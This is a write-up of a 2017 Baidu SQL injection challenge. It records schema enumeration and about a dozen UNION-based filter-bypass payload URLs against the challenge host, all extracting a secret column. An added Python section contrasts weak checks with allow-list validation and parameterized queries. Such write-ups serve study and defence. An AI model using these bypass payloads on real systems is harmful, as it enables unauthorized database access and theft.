Baidu May 2017 SQL Injection Challenge
1. Basic information gathering
Database name: security_btest
Version: 5.5.54-0+deb8u1
Table name: books_btest_BFE2
Columns: id_8994, author_6C61, title_19D0, price_77BC, secret_E295
Retrieving the table name
http://sqlitest.anquanbao.com.cn/api/query?art_id=2 /*!union*/select!1,{0a (select/**/GROUP_CONCAT(TABLE_NAME)/**//**/from/**/information_schema.TABLES/**/where/**/TABLE_SCHEMA/**/in('security_btest'))},!2
Retrieving the column names
http://sqlitest.anquanbao.com.cn/api/query?art_id=2%20/*!union*/select!1,%7B0a%20(select/**/GROUP_CONCAT(COLUMN_NAME)/**//**/from/**/information_schema.CoLUMNS/**/where/**/CoLUMNS.TABLE_name/**/in(%27books_btest_BFE2%27))%7D,!2
2. Bypass
2.1 Using null plus curly braces {} to bypass the column filter
http://sqlitest.anquanbao.com.cn/api/query?art_id=33 union select not null,{0a (select secret_E295 from books_btest_BFE2 limit 1)},null
2.2 Using the @ symbol to bypass the column restriction
http://sqlitest.anquanbao.com.cn/api/query?art_id=2 /*!union*/select@1,(select secret_E295 from books_btest_BFE2 limit 1),2
2.3 Using the exclamation mark to bypass the column restriction
http://sqlitest.anquanbao.com.cn/api/query?art_id=2 /*!union*/select!1,{0a (select secret_E295 from books_btest_BFE2 limit 1)},!2
2.4 Using scientific notation to bypass the union filter
http://sqlitest.anquanbao.com.cn/api/query?art_id=2e1union select 1,(select secret_E295 from books_btest_BFE2 limit 1),3
2.5 Using the percent sign to bypass
http://sqlitest.anquanbao.com.cn/api/query?art_id=-1 union select secret_E295,2,3 from books_btest_BFE2 where 1 or '%' limit 1
2.6 I'm honestly a bit puzzled myself as to how this payload got through...
http://sqlitest.anquanbao.com.cn/api/query?art_id=2 union select secret_E295,0 between null and 2,-2 from books_btest_BFE2
2.7 Using a floating-point number to bypass the union restriction; note that no digits need to follow "0.".
http://sqlitest.anquanbao.com.cn/api/query?art_id=0.union select 1,(select secret_E295 from books_btest_BFE2 limit 1),3
2.8 Using symbols to bypass the column restriction.
http://sqlitest.anquanbao.com.cn/api/query?art_id=1 union select 1,'\/',(select secret_E295 from books_btest_BFE2 limit 1)
2.9 Using as plus quotes to bypass the column restriction.
http://sqlitest.anquanbao.com.cn/api/query?art_id=1 union select (1)"a",(select secret_E295 from books_btest_BFE2 limit 1),2
2.10 When union is joined directly to the preceding number, the column restriction no longer applies.
http://sqlitest.anquanbao.com.cn/api/query?art_id=1%2b{0a 1}union select 1,(select secret_E295 from books_btest_BFE2 limit 1),2
------------- After the fix ------------
2.11 Took another look at it later and found that some of the payloads had been fixed, for example the single exclamation mark I submitted to you earlier; a double exclamation mark can bypass it.
http://sqlitest.anquanbao.com.cn/api/query?art_id=2 union select!!1,2,(select group_concat(secret_E295) from books_btest_BFE2)
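All of the payloads above share one root cause: the art_id parameter was only checked loosely (or matched against a keyword blacklist) and then used in the query. The following is an added example, not code from the challenge or from the original post; it contrasts a prefix-only numeric check and a hypothetical keyword blacklist (assumed for illustration, not the challenge's real WAF rule) with the fix that actually closes the class: allow-list validation of the whole value plus a parameterized query. The article table, its rows and the sample values are constructed here.

```python
import re
import sqlite3

# Constructed art_id values modelled on the URL-decoded payloads above;
# used only to exercise the three checks below.
SAMPLE_PAYLOADS = [
    "2 /*!union*/select!1,{0a (select 1)},!2",
    "33 union select not null,{0a (select 1)},null",
    "2e1union select 1,2,3",
    "0.union select 1,2,3",
    "1+{0a 1}union select 1,2,3",
    "2 union select!!1,2,3",
]

def naive_numeric_check(value: str) -> bool:
    """Accepts anything that merely *starts* with digits: no end anchor."""
    return re.match(r"\d+", value) is not None

def hypothetical_blacklist(value: str) -> bool:
    """Keyword rule assumed for illustration; comment and number tricks slip past it."""
    return re.search(r"\bunion\s+select\b", value, re.IGNORECASE) is not None

def strict_art_id(value: str) -> int:
    """Allow-list: the entire value must be a plain positive integer."""
    if re.fullmatch(r"[1-9][0-9]{0,9}", value) is None:
        raise ValueError("art_id must be a positive integer")
    return int(value)

def is_rejected(value: str) -> bool:
    try:
        strict_art_id(value)
    except ValueError:
        return True
    return False

def demo_connection() -> sqlite3.Connection:
    """In-memory table standing in for the challenge's article endpoint."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE articles (id INTEGER PRIMARY KEY, title TEXT)")
    conn.executemany("INSERT INTO articles VALUES (?, ?)", [(1, "first"), (2, "second")])
    return conn

def fetch_title(conn: sqlite3.Connection, raw_art_id: str):
    """Validate first, then bind the value instead of concatenating it into SQL."""
    art_id = strict_art_id(raw_art_id)
    row = conn.execute("SELECT title FROM articles WHERE id = ?", (art_id,)).fetchone()
    return row[0] if row else None
```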
3. Summary
Baidu probably did not prepare thoroughly enough; there seem to have been a lot of unintended payloads.